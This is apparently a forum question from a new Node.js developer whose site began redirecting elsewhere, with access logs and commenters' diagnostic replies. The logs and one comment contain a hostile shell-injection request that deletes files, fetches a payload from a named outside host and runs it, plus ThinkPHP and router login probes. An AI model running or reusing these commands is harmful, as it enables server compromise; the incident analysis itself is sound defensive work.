# My node js website was attacked. How do I analyze what hapened?

Tags: node.js, server-side-attacks

I am new to web programming and I coded a Node js website. I know C very well but not JS.
I recently changed the port forward to port 80 and it didn't take long before I was attacked. I saved the logs and undid the forwarding of port 80. Could anyone help me analyze what happened from the logs I got and help me know what has to be done in order to repair the damage?
Basically, what was happening was my website constantly redirected me to a sketchy p*rn website...
Should I reinstall windows?
How can I prevent this from happening again?

Here are the logs:

```
GET / 302 3.645 ms - 28
POST /HNAP1/ 404 1.731 ms - 146
GET /shell?cd+/tmp;rm+-rf+*;wget+jx.qingdaosheng.com/jaws;sh+/tmp/jaws - - ms - -
GET / 302 3.529 ms - 28
GET /login 200 4.956 ms - 899
GET / 302 3.630 ms - 28
POST /Autodiscover/Autodiscover.xml 404 1.961 ms - 169
HEAD / 302 3.398 ms - 28
HEAD /login 200 5.009 ms - 899
GET /admin/assets/plugins/elfinder/php/connector.php 404 4.192 ms - 186
GET / 302 3.543 ms - 28
GET / 302 2.859 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.777 ms - 28
GET / 302 6.587 ms - 28
GET / 302 2.774 ms - 28
GET / 302 2.781 ms - 28
GET / 302 2.770 ms - 28
GET / 302 2.978 ms - 28
GET / 302 2.645 ms - 28
GET / 302 2.802 ms - 28
GET / 302 2.725 ms - 28
GET / 302 2.794 ms - 28
GET / 302 1.433 ms - 28
GET / 302 2.773 ms - 28
GET / 302 2.718 ms - 28
GET / 302 2.785 ms - 28
GET / 302 2.742 ms - 28
GET / 302 6.103 ms - 28
GET / 302 2.771 ms - 28
GET / 302 2.745 ms - 28
GET / 302 0.895 ms - 28
GET / 302 2.786 ms - 28
GET / 302 2.787 ms - 28
GET / 302 2.877 ms - 28
GET / 302 2.757 ms - 28
GET / 302 5.917 ms - 28
GET / 302 2.831 ms - 28
GET / 302 2.800 ms - 28
GET / 302 2.792 ms - 28
GET / 302 4.423 ms - 28
GET / 302 2.816 ms - 28
GET / 302 2.695 ms - 28
GET / 302 2.738 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.745 ms - 28
GET / 302 2.765 ms - 28
GET / 302 2.698 ms - 28
GET / 302 2.854 ms - 28
GET / 302 2.839 ms - 28
GET / 302 6.197 ms - 28
GET / 302 2.983 ms - 28
GET / 302 2.794 ms - 28
GET / 302 2.722 ms - 28
GET / 302 2.780 ms - 28
GET / 302 2.776 ms - 28
GET / 302 2.775 ms - 28
GET / 302 2.742 ms - 28
GET / 302 2.772 ms - 28
GET / 302 2.668 ms - 28
GET / 302 2.723 ms - 28
GET / 302 2.717 ms - 28
GET / 302 5.661 ms - 28
GET / 302 2.771 ms - 28
GET / 302 2.700 ms - 28
GET / 302 6.351 ms - 28
GET / 302 2.801 ms - 28
GET / 302 2.734 ms - 28
GET / 302 6.229 ms - 28
GET / 302 1.745 ms - 28
GET / 302 2.727 ms - 28
GET / 302 2.777 ms - 28
GET / 302 2.734 ms - 28
GET / 302 1.434 ms - 28
GET / 302 2.739 ms - 28
GET / 302 2.711 ms - 28
GET / 302 5.326 ms - 28
GET / 302 2.664 ms - 28
GET / 302 2.677 ms - 28
GET / 302 0.891 ms - 28
GET / 302 2.783 ms - 28
GET / 302 2.745 ms - 28
GET / 302 2.738 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.740 ms - 28
GET / 302 2.720 ms - 28
GET / 302 2.769 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.749 ms - 28
GET / 302 5.041 ms - 28
GET / 302 2.789 ms - 28
GET / 302 2.725 ms - 28
GET / 302 2.657 ms - 28
GET / 302 2.712 ms - 28
GET / 302 2.709 ms - 28
GET / 302 2.681 ms - 28
GET / 302 2.708 ms - 28
GET / 302 2.678 ms - 28
GET / 302 2.686 ms - 28
GET / 302 6.256 ms - 28
GET / 302 1.400 ms - 28
GET / 302 2.749 ms - 28
GET / 302 2.741 ms - 28
GET / 302 2.779 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.742 ms - 28
GET / 302 2.774 ms - 28
GET / 302 5.494 ms - 28
GET / 302 2.724 ms - 28
GET / 302 2.723 ms - 28
GET / 302 2.737 ms - 28
GET / 302 2.715 ms - 28
GET / 302 2.667 ms - 28
GET / 302 2.721 ms - 28
GET / 302 2.721 ms - 28
GET / 302 2.781 ms - 28
GET / 302 2.734 ms - 28
GET / 302 2.708 ms - 28
GET / 302 2.747 ms - 28
GET / 302 2.769 ms - 28
GET / 302 2.768 ms - 28
GET / 302 2.776 ms - 28
GET / 302 5.605 ms - 28
GET / 302 2.741 ms - 28
GET / 302 2.837 ms - 28
GET / 302 2.724 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.740 ms - 28
GET / 302 5.212 ms - 28
GET / 302 2.696 ms - 28
GET / 302 2.732 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.700 ms - 28
POST /boaform/admin/formLogin 404 3.031 ms - 163
GET / 302 3.579 ms - 28
POST /boaform/admin/formLogin 404 2.609 ms - 163
HEAD / 302 7.173 ms - 28
GET / 302 3.531 ms - 28
GET / 302 3.738 ms - 28
GET /login 200 6.611 ms - 899
GET /?XDEBUG_SESSION_START=phpstorm 302 3.465 ms - 28
GET /login 200 4.785 ms - 899
GET / 302 6.692 ms - 28
GET /login 200 4.763 ms - 899
GET / 302 3.788 ms - 28
GET /login 200 5.032 ms - 899
GET / 302 3.390 ms - 28
GET / 302 6.433 ms - 28
GET / 302 3.553 ms - 28
GET /login 200 4.816 ms - 899
GET / 302 3.593 ms - 28
GET /login 200 3.175 ms - 899
GET / 302 3.621 ms - 28
GET / 302 3.566 ms - 28
GET / 302 3.481 ms - 28
GET / 302 3.204 ms - 28
GET /login 200 4.710 ms - 899
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 
3.642 ms - 148
GET / 302 3.487 ms - 28
GET /login 200 4.985 ms - 899
GET / 302 3.500 ms - 28
GET /login 200 8.021 ms - 899
GET / 302 3.668 ms - 28
```

Comment: The log entry for `GET /shell?`... (3rd line) did not report a 404.  Does that mean that your web server actually did something on that step?  It looks like it wants to invoke `shell` and pass it the command line.  `cd /tmp; rm -rf *;wget jx.qingdaosheng.com/jaws;sh /tmp/jaws` I wonder what happens when you `GET /shell` in your web server?  Did something bad end up happening server-side?

Comment: There is no "shell" directory in my server if it's what you are asking. I don't know what to check to know if "something bad end up happening server-side"...

Comment: If your own server was redirecting to some other site that you have nothing to do with, then something is seriously compromised.  It's hard for us to say what is compromised.

Comment: What happens on your server when this request `GET /shell?cd+/tmp;rm+-rf+*;wget+jx.qingdaosheng.com/jaws;sh+/tmp/jaw` is received?  That looks like an attempt at a compromise, but a properly written nodejs server would just return a 404 for that without processing the query parameters.

Comment: If there is no `shell` directory or route in your server, then why doesn't your log message for the `GET /shell?...` request show a 404 error?  What did your server do instead?  What middleware is installed in your app that may be responding to this route?  Search your code for `app.use(`.  Maybe fire up postman and do something harmless like `GET /shell?ls` and see if this actually manages to execute the `ls` command in a shell (which would be _terrible_, by the way, and worth figuring out why that's possible - because it _shouldn't_ be!)

Comment: Your package.json will have a list of dependencies that may be responsible for a vulnerability.  I'm trying to figure out which module may have installed a `/shell` route handler (if that is, indeed, what happened).  I'd like to see your package.json to get a list of suspects.